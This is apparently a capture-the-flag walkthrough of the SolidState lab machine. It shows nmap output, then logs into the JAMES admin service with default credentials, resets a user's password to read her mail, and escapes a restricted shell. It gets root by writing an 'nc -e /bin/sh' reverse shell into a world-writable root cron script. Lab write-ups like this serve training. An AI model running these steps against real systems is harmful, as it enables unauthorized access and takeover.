Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.0.0.1 [10.0.0.1]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
MAC Address: 08:00:27:84:65:27 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 198.839 days (since Sat Mar 30 21:17:42 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernelHere we got default credentials for James Admin Server running at port 4555
We connect it with
nc 10.0.0.29 4555user = root, passowrd = root listuserssetpassword mindy mindy
And now we will see the mails of mindy at smtp running at port 110
telnet 10.0.0.29 110USER mindyPASS mindyLISTTOP 2 836 # and we got the password for mindy ssh
Here we got ssh mindy password now let’s connect with it
Here we -rbash shell which doesn’t allow us to use some commands so we can bypass this shell using
ssh mindy@10.0.0.29 sh
Got the SH shell and now we can have our user.txt , let’s search for root privilege , on running pspy32 for checking background processes i got /opt/tmp.py to be running in every 3–4 mins with root and luckily we got tmp.py to be world writable
So let’s see how we can utilize it for our use in getting root privilege , we will just edit the tmp.py file using echo command
echo “import os
os.system(‘nc 10.0.0.1 80 -e /bin/sh’) " > /opt/tmp.pyAnd we had successfully edited the tmp.py file to our nc reverse shell so let’s now visit for nc listener at our localhost
And BOOM 💣 we got root shell and root flag
……………………………….COWABUNGA……………………………………
